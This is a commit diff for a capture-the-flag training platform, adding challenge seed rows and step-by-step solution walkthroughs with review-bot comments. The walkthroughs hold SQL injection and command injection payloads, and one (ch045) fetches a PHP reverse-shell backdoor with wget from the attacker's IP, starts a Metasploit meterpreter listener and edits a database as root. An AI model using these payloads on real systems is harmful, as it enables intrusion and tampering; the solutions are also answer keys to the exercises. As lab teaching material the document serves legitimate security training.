Hello, we have heard that you are one of the best hackers in our country. We need your services. You must visit an underground site and find the right password. With this password we will cancel 100k+ illegal gun and drug deals!\n The good news are that we have the directory where the password is stored. Its here \\"/t0psec\\".\n The bad news are that we have no access there. Only the administrator does. Go and find the password for us!
Good luck!
', 'Nikos Danopoulos', 'web', '2012-08-09 00:32:07', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
+(43, 'Challenge 41', 'ch041', '\n \n A Friend of your''s is a great football freak, he has newly created a website [ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.\n \n \nHints and tips : First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here''s one : "Images can reveal way too much". All the Best, don''t lose patience !!\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'stegano', '2016-03-8 06:51:22', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+(44, 'Challenge 42', 'ch042', '\n \n Government officials have discovered a paid website, which might have illegal activities covering under them, and they have hired you to get the admin login details of this SITE. However, they have solved this to an extent and have MITM''d a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn''t enough to get to the user''s profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.\n \n \nHints and Tips : You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup''d. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You''re LOGGED in (atleast as a user). Here''s another : Wanna have a Cookie ??\n \n reference1\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'cool', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+(45, 'Challenge 43', 'ch043', '\n \n A Web Developer has made his best out to secure his website from various injection attacks by using various filters and even thinks that even the best hacker couldn''t break into his site. Prove him wrong. Link : SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn''t even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
\n \nHints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. reference1reference2
+]]>\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'sqli', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
-- --------------------------------------------------------
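Review bot: The descriptions added here for Challenge 42 and 43 differ from the copies added to db.sql in the same commit: the db.sql versions end with a "Setup database HERE" step that these rows lack. A player on an instance seeded from this file would not be told to set up the challenge database first, assuming that step is required. Sharing one literal between the two files, or adding a comment such as `-- keep in sync with installation/sql/db.sql (ch041-ch043)` above the rows, would stop the seeds from drifting apart. The rows also jump from id 12 to ids 43–45 under the titles Challenge 41–43, which deserves a one-line comment explaining the numbering. The INSERT statement begins above the hunk.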
diff --git a/locale/en/LC_MESSAGES/messages.mo b/locale/en/LC_MESSAGES/messages.mo
old mode 100644
new mode 100755
diff --git a/locale/en/LC_MESSAGES/messages.po b/locale/en/LC_MESSAGES/messages.po
old mode 100644
new mode 100755
diff --git a/locale/fr/french.pot b/locale/fr/french.pot
old mode 100644
new mode 100755
diff --git a/misc_scripts/add_Guest_to_every_class.php b/misc_scripts/add_Guest_to_every_class.php
old mode 100644
new mode 100755
diff --git a/misc_scripts/mass_add_challenge.php b/misc_scripts/mass_add_challenge.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Challenge.php b/model/common/class.Challenge.php
old mode 100644
new mode 100755
diff --git a/model/common/class.ChallengeAttempts.php b/model/common/class.ChallengeAttempts.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Menu.php b/model/common/class.Menu.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Page.php b/model/common/class.Page.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Plugin.php b/model/common/class.Plugin.php
old mode 100644
new mode 100755
diff --git a/model/common/class.RegexSolution.php b/model/common/class.RegexSolution.php
old mode 100644
new mode 100755
diff --git a/model/common/class.ScoringRule.php b/model/common/class.ScoringRule.php
old mode 100644
new mode 100755
diff --git a/model/common/class.UserScore.php b/model/common/class.UserScore.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Utils.php b/model/common/class.Utils.php
old mode 100644
new mode 100755
diff --git a/pages/index.php b/pages/index.php
old mode 100644
new mode 100755
diff --git a/solution/ch041_solution.txt b/solution/ch041_solution.txt
new file mode 100755
index 00000000..ffd28613
--- /dev/null
+++ b/solution/ch041_solution.txt
@@ -0,0 +1,38 @@
+Challenge 041 : Easy CTF Login challenge
+
+The first thing one would notice is, right click is disabled on this admin page, one can either use the shortcut to veiw soirce, or some extenstions or tools like web developer etc.
+
+once you view the source, it shows ""
+
+Right click has been disabled which you've gone through.
+If you look carefully, you will notice that the view source page is quite lengthy
+So scroll your way down towards the end. there's the source code.
+These tricks are commonly used by some web developers to hide source code.
+
+Everything looks normal on the code, normal post login form..
+"action=pwd.php"
+let's check this out --> invalid username password, ok so this is not the vulnerability.
+
+In style.css file u get "images/football2.jpg"
+but images/ dir is protected
+
+Try going through all the files in source code, precisely more suspicious file..
+If you get a closer look at it,
+there's this image.jpg file wen you view that, you notice that it's not used anywhere else so far in our site
+so this might be of some help.
+
+Looks like a normal image, but is it?
+Everything that shines is not Gold.
+
+Lets save this image and check the type of file, this is correct : jpeg file
+lets view the contents of file using hexeditor or strings
+
+When one views it, you 'll notice something like this " YWRtaW4= : QGRtIW4hJDRSQDQwUg=="
+towards end.. which pretty much looks like username:password
+
+This sure looks encoded, one would get that from experience that it's one of the most common encrypted format i.e. Base64 encoded
+Hence decode both strings and login with the credentials
+
+Successful !!!
+
+Hope You Learned Some new things and Enjoyed this Challenge !!!
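Review bot: This walkthrough discloses the challenge's encoded admin credentials and is added under `solution/`, beside the application's `index.php`. On an install where the repository root is the document root, any participant could presumably fetch it directly and skip the exercise. The same applies to `ch042_solution.txt`, `ch043_solution.txt` and `ch044_solution.txt` added below. Keeping the solutions outside the served tree, or denying web access to the directory in the server configuration, would reserve them for instructors. The file is also created with mode 100755 although it is plain text; `git update-index --chmod=-x solution/ch041_solution.txt` would clear the executable bit.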
diff --git a/solution/ch042_solution.txt b/solution/ch042_solution.txt
new file mode 100755
index 00000000..d7b0fcdc
--- /dev/null
+++ b/solution/ch042_solution.txt
@@ -0,0 +1,58 @@
+Challenge 042 : Medium Spy Admin Challenge
+
+Welcome to this interesting challenge.
+login form --> let's try sql injection various methods : neither of them works
+there might be a reason you've been given a user credentials
+It looks like a simple website.. let's login with the given username and password.
+
+Looks suspicious..
+"Our Customer" "Paid Browser" --> "OurBrowser"
+
+The Customers have been secretised to used some specific paid browser
+Let's check out by changing our UserAgent to "OurBrowser"
+u can create this using User Agent addon or tamper request using tamper data or burpsuite
+
+Now u have access to ur profile
+it shows username and some call id.
+
+which might be coming from database.
+lets try injecting some queries into different injection fields.. such as along with user agent.
+lets check out our cookies
+
+the content looks something like c2NydHVzcg%3D%3D %3D = "="
+c2NydHVzcg==
+
+this sure is base64 encoded.. let's decode this : scrtusr
+this is the username we have logged in as
+OKAY !! the cookie has content as username which is being encoded as base64
+so let's try base64 encoded (admin).. might work :)
+
+admin : YWRtaW4=
+Nice Try :P
+
+so let's try something else :
+let's try to inject this field as : base64[scrtusr'] : c2NydHVzcic=
+save the cookie
+wow.. it gives : you almost got it.. so surely this part is injectable.. let's try another queries as scrtusr' or scrtusr" with base64 encoding
+and with some time u'll come to know that the query is balanced using ')
+
+') order by 4-- - : gives unknown column 4
+so no. of columns is 3
+
+let's base 64 encode this : ') union all select 1,2,3 -- - and inject in our cookie
+
+so we get the vulnerable column i.e. 2
+so let's inject this completely using error sql injection
+
+') union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- -
+JykgdW5pb24gYWxsIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAtLSAt
+
+gives tables : emails and users
+
+inject into table and get the username and password for admin
+
+admin : TheAdminPassw0rd
+
+Congratulations You Tried Your Best (y)
+
+Hope you enjoyed this challenge and Learned some new Things about WebApp Security !!!
diff --git a/solution/ch043_solution.txt b/solution/ch043_solution.txt
new file mode 100644
index 00000000..b450c8a7
--- /dev/null
+++ b/solution/ch043_solution.txt
@@ -0,0 +1,32 @@
+Challenge 043 : Experienced Injection Challenge
+
+YOU're logged in a user and when u notice the url it's a GET request.. so we might some thing like sql injection seems easy..
+http://localhost:8008/inside/main_index.php?id=1'
+getting a simple erroe on adding of ' at the end
+That means, for sure SQL injection is possible in this
+let's dig a bit deeper
+' -- - doesnt works
+Spaces are Filtered :/
+Filters Filters everywhere.. Developer has worked out some !!
+
+http://localhost/sqli-labs/Less-26/?id=1'&&'1
+http://localhost/sqli-labs/Less-26/?id=1%27%A0union%A0all%A0select%A01,2,3%26%26%20%271
+http://localhost/sqli-labs/Less-26/?id=1777%27union%A0all%A0select%A01,2,3%26%26%271
+
+this was good.. actually.. spaces are filtered some and also and and or.. so url encoding and any random character at that place and the query works
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,database%28%29,group_concat%28table_name%29%A0from%A0information_schema.tables%A0where%A0table_schema=database%28%29%26%26%271
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,group_concat%28table_name%29,3%A0from%A0information_schema.tables%A0where%A0table_schema=database%28%29%26%26%271
+gives : emails and users table
+
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,group_concat%28column_name%29,3%A0from%A0information_schema.columns%A0where%A0table_name=%27users%27%26%26%271
+
+dump the admin username and password
+theadmin : theadmin123
+
+/robots.txt : gives u the admin page
+
+Successful !!
+Hope you enjoyed this challenge !!!
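Review bot: Three of the example URLs (the `http://localhost/sqli-labs/Less-26/?id=...` lines) point at a different lab than the challenge's own `http://localhost:8008/inside/main_index.php`, so a reader following the steps cannot reproduce them; they look like leftover notes and should be rewritten against the challenge URL or dropped. The sentence describing the filter ("spaces are filtered some and also and and or") is hard to parse; I would state it once as `the filter rejects spaces and the keywords and/or, so a blacklist is the only thing protecting the id parameter`. The walkthrough also ends without naming the fix, and a closing line such as `Lesson: bind id as a query parameter; filtering characters does not make a concatenated query safe` would make the point of the challenge explicit.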
diff --git a/solution/ch044_solution.txt b/solution/ch044_solution.txt
new file mode 100644
index 00000000..e96a3153
--- /dev/null
+++ b/solution/ch044_solution.txt
@@ -0,0 +1,31 @@
+Challenge 044 : Command Injection Easy
+
+A simple web page that pings and tells you the information abt the web server.
+google.com : gives the result as such
+fb.com : gives the result like 200 OK or 301 redirect
+and other information too lot of information
+
+let's try something else
+ls
+whoami
+
+google.com; ls
+google.com && ls
+doesnt' work all filtered
+
+let's try
+google.com || ls .. this too filtered
+
+kk the blacklist is provided to you.. so you know the symbols that are blocked.. like ; & | are blocked
+ || --> ''
+
+ and '| ' --> ''
+ aah.. there's no filter for '|'
+
+let's tryy google.com |ls -al
+and boom u're able to get all the files in the directory
+
+cat the EPL.txt and enter it on the login page
+
+Hope You enjoyed it !!!
+
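Review bot: The blacklist description contradicts itself: one line says `; & |` are blocked and a few lines later it says there is no filter for `|`. From the two replacement rules shown (`||` and `'| '` mapped to empty) it appears that only the double pipe and pipe-plus-space are stripped, so the summary should read `; & || and '| ' are blocked, a bare | is not`. A closing sentence on the fix would help too, for example `Lesson: a character blacklist in front of a shell call is incomplete by construction; validate the host against a strict pattern and pass it as one escaped argument`.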
diff --git a/solution/ch045_solution.txt b/solution/ch045_solution.txt
new file mode 100644
index 00000000..27d664d2
--- /dev/null
+++ b/solution/ch045_solution.txt
@@ -0,0 +1,57 @@
+Challenge 045 : Tricky Injection Challenge Trip To Dawki RCE
+
+Looks like a paint blog of student
+
+let's put input at the ip_searchfield
+' "
+8.8.8.8
+8.8.8.8; whoami
+8.8.8.8 && whoami
+
+127.0.0.1 || ls -al : gives the ouput of ping and as well all the files in the same directory
+
+from given information payload file was WAS backdoor.php
+here the list shows the file could be backdoor.txt
+let's see the content of it
+
+1.1.1.1 || cat backdoor.txt
+looks like encoded.. let's copy this content of text file onto some of our notepad and decode it.
+first urldecode and then base64 decode it.. u'll get a php code.. looks like a php backdoor that establishes a reverse connection on the specified LHOST and LPORT look like a local ip.. let's edit this payload to get the connection to our ip.. with lhost as "your ip" my case : 192.168.0.104 and let the LPORT be 4444
+
+Add tags at the start and end of the backdoor
+let's save this file on our local system on localhost as backdoor.txt
+
+let's get this edited backdoor on the SERVER
+searchfield : || wget http://192.168.0.104/backdoor.txt -O backdoor.php
+searchfield : `wget http://192.168.0.104/backdoor.txt -O backdoor.php` 192.168.0.104 is my ip.. check in for ur case : ifconfig
+ `wget http://192.168.0.104/backdoor.txt -O backdoor.php`
+
+now 127.0.0.1 || ls -al gives backdoor.php
+
+let's execute this php.. before that
+let's FIRE up metasploit or armitage and turn up our listener
+
+armitage :
+use exploit/multi/handler
+set PAYLOAD php/meterpreter/reverse_tcp
+show options
+set LHOST 192.168.0.104
+set LPORT 4444
+
+exploit
+
+now let's execute our backdoor.php
+searchfield : 11.1.1.11 || php -f backdoor.php
+
+and u'll get the meterpreter session started on ur armitage.. gaining access to the server.. let's do our work now :D
+
+
+echo "show databases;" | mysql -u root --password=password //gives all the databases.. we need TripDawki
+echo "select * from TripDawki.students;" | mysql -u root --password=password //select that database
+echo "UPDATE TripDawki.students set payment='PAID' where id=15;" | mysql -u root --password=password //our target change the payment mode to PAID
+
+DONE !!
+
+play around with the server YOU have REMOTE access to it.
+
+HOPE you enjoyed this challenge !!!
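Review bot: The final steps run `mysql -u root --password=password` from the web server's shell, so the challenge host keeps a root database account with a trivial password within reach of the web user; if that MySQL instance is shared with the platform or with other challenges (not visible from this file), solving this one exposes their data as well. The solution or the challenge's setup notes should state the isolation requirement, e.g. `Setup: run this challenge in a dedicated container with its own MySQL instance holding only TripDawki`. Two wording problems: `payload file was WAS backdoor.php` repeats a word, and `Add tags at the start and end of the backdoor` does not say which tags, possibly because the literal tags were lost when the file was written.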
diff --git a/solution/ch046_solution.txt b/solution/ch046_solution.txt
new file mode 100644
index 00000000..da6e4823
--- /dev/null
+++ b/solution/ch046_solution.txt
@@ -0,0 +1,40 @@
+Challenge 046 : Medium Level command injection
+
+It's a simple web page that converts to sha256 prolly
+let's try some random inputs
+
+try me || uname -a
+;ls -al
+try me; ls
+
+notice carefully at the end there is "-" sign which is linuxcli md5sum program (Google it)
+it gives us the idea that command at the backend is something like : echo "string" | sha256sum
+
+
+GET /index.php?string=try : (try)
+ 95fdbdf2fea4b306d059facf26c18d94cb190189a3221008eca14c5dd0b0fce1 -
+
+GET /index.php?string=lol;%20try : (lol; try)
+ e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 -
+
+GET /index.php?string=lol;%20echo%20try : (lol; echo try)
+ 95fdbdf2fea4b306d059facf26c18d94cb190189a3221008eca14c5dd0b0fce1 -
+
+The output of 1 and 3 is same, so it does mean that
+the command goes like
+echo lol; echo try | sha56sum .. so it prints lol first and then applies sha256sum on try
+
+so, command injection is possible :D
+
+let's try : try me;ls -al; something
+ lol%3Bls%20-al;echo+try
+
+it will list all the files in that directory.. and there's ur file : EPL.txt
+
+get value : lol%3Bcat%20EPL.txt;echo+try
+get request : test;%20cat%20/etc/passwd;%20something
+cat file EPL.txt to get the flag i.e. : thenew_flag
+
+you can play around now leading this to Remote Code Execution on the main server.. there might be something more hidden on it ;)
+
+
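Review bot: The inference step names the wrong tool twice: the trailing `-` is attributed to the `md5sum` program although the page computes SHA-256, and the reconstructed command is written `sha56sum`; both should read `sha256sum`. The second sample output, `e3b0c442…b855`, is the SHA-256 of empty input, which is what you get when the command left of the pipe prints nothing, and saying so would complete the reasoning that `try` was run as a separate command. The `test;%20cat%20/etc/passwd;%20something` line is not used by the steps around it and reads like a leftover. A closing line naming the fix, such as `Lesson: hash the string in-process instead of passing it to a shell`, would round off the walkthrough.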
diff --git a/solution/ch048_solution.txt b/solution/ch048_solution.txt
new file mode 100755
index 00000000..9516309e
--- /dev/null
+++ b/solution/ch048_solution.txt
@@ -0,0 +1,61 @@
+Challenge 048 : Medium CTF Challenge
+
+Welcome to CTF.
+Looks like a simple page with simple source, usually simple pages have most things hidden in them.
+Complete White Background Suspicious
+
+CTRL + A page and scroll down u notice a hint there hidden.. shows "robots.txt"
+OR you can also scroll down the source page and get that hint.
+
+User-agent: *
+Disallow: /dir/indexX.php //suspiciuos page
+
+User-agent: *
+Disallow: /inside/submit.php //submit flag page
+
+/inside/submit.php : checking this directory out nothing here, this page is to submit the flag
+/dir/ directory too, nthing here except
+/dir/indexX.php : says protected area, enter the site :
+asks for username and password saying : Protected Area !!
+admin:admin admin:pass doesnt works so surely, it's not made for guessing
+
+this page heads to /dir/secret/ okay.. but we dont have the username and password for it.
+
+This authentication might be of .htaccess file so let's use curl to check out request methods allowed and use different http methods to this /secret dir.
+
+curl -X OPTIONS -v http://locahost:8008/dir/secret : we can see all methods are allowed
+let's use GET for checking and it gives 200 OK !! WOhhhhh Bypassed !!!
+
+So, the fault in .htaccess file is that.. it just limits and authenticates on POST http method request.
+
+so if u just type or reload url : http://localhost:8008/dir/secret/ you will be able to access the page :D
+
+Good one Wats Next.. It's not as easy as it looks 0_0
+
+(White Background always makes me suspicious)
+CTRAL + A --> gives me that "It's not as easy as it looks" is an image okay,
+let's check out the susp image directory
+http://localhost:8008/dir/secret/images/its.jpg
+
+there's another file in images/ : image.jpeg
+which contains "errors" so let's check out these "errors" save this file first.
+
+image.jpeg
+view contents using "strings image.jpeg" or cat or gedit.. it shows.. some random strings.. n also s string name "sec.wav" might be an audio file
+using "file image.jpeg" u'll see that it gives zip archive, kk so this a zip file
+
+rename "image.jpeg" --> "image.zip"
+extract it : u'll get a wav audio file.. named sec.wav let's check this out
+audio is kind of random, might have something hidden inside it, steganography.
+Google out Steganography if u've never heard of this term.
+
+let's figure this audio using Sonic Visualiser
+looks like a simple audio file.. let's add sprectrogram filter and there you go --> PIKACHU
+
+so, this was an image file that was rendered blue and then converted to audio file :D
+
+so the flag is : PIKACHU
+
+Successful !!!
+
+Hope You Learned Some new things and Enjoyed this Challenge !!!
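Review bot: The curl command has a typo in the host, `http://locahost:8008/dir/secret`, so it will not resolve as written; it should be `http://localhost:8008/dir/secret`. The explanation that the .htaccess "just limits and authenticates on POST" stops short of the fix: if the auth rule is wrapped in a `<Limit POST>` block (inferred, the .htaccess is not in this hunk), the remedy is to remove the wrapper so that `Require valid-user` applies to every method, and a line saying that would make the lesson usable. `CTRAL + A` and `suspiciuos` are typos.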
diff --git a/user/plugins/article-challenge-connect/class.ArticleChallengeModel.php b/user/plugins/article-challenge-connect/class.ArticleChallengeModel.php
old mode 100644
new mode 100755
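Review bot: This entry and the mode-only entries that follow it (templates under `user/plugins` and `view/`, `install-plugin.sql`, `logo.jpg`, `pictogram.gif`, `403.html`, `404.html`, among others) flip files from 100644 to 100755 with no content change, and judging by their paths none of them is meant to be executed directly. This looks like an artifact of committing from a filesystem or archive that does not preserve modes. Executable bits on web-served data files widen what a misconfigured handler or a file-write bug can do, so I would restore 0644 and, if it keeps recurring, set `core.fileMode` to `false` in the committing checkout. `solution/ch048_solution.txt` is likewise created as 100755 while the other solution files in this diff are 100644.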
diff --git a/user/plugins/article-challenge-connect/editarticle.tpl b/user/plugins/article-challenge-connect/editarticle.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/addchallenge.tpl b/user/plugins/challenge-clues/addchallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/challenge-clues.php b/user/plugins/challenge-clues/challenge-clues.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/class.Clue.php b/user/plugins/challenge-clues/class.Clue.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/class.UserCluesModel.php b/user/plugins/challenge-clues/class.UserCluesModel.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/editchallenge.tpl b/user/plugins/challenge-clues/editchallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/install-plugin.sql b/user/plugins/challenge-clues/install-plugin.sql
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/showChallenge.tpl b/user/plugins/challenge-clues/showChallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/admin/view/menumanager.tpl b/user/themes/custom-theme/admin/view/menumanager.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/admin/view/options.tpl b/user/themes/custom-theme/admin/view/options.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/custom-theme.php b/user/themes/custom-theme/custom-theme.php
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/view/images/logo.jpg b/user/themes/custom-theme/view/images/logo.jpg
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/view/images/pictogram.gif b/user/themes/custom-theme/view/images/pictogram.gif
old mode 100644
new mode 100755
diff --git a/view/_footer_frontend.tpl b/view/_footer_frontend.tpl
old mode 100644
new mode 100755
diff --git a/view/challenge_list.tpl b/view/challenge_list.tpl
old mode 100644
new mode 100755
diff --git a/view/errors/403.html b/view/errors/403.html
old mode 100644
new mode 100755
diff --git a/view/errors/404.html b/view/errors/404.html
old mode 100644
new mode 100755
diff --git a/view/progressreport.tpl b/view/progressreport.tpl
old mode 100644
new mode 100755
diff --git a/view/showChallenge.tpl b/view/showChallenge.tpl
old mode 100644
new mode 100755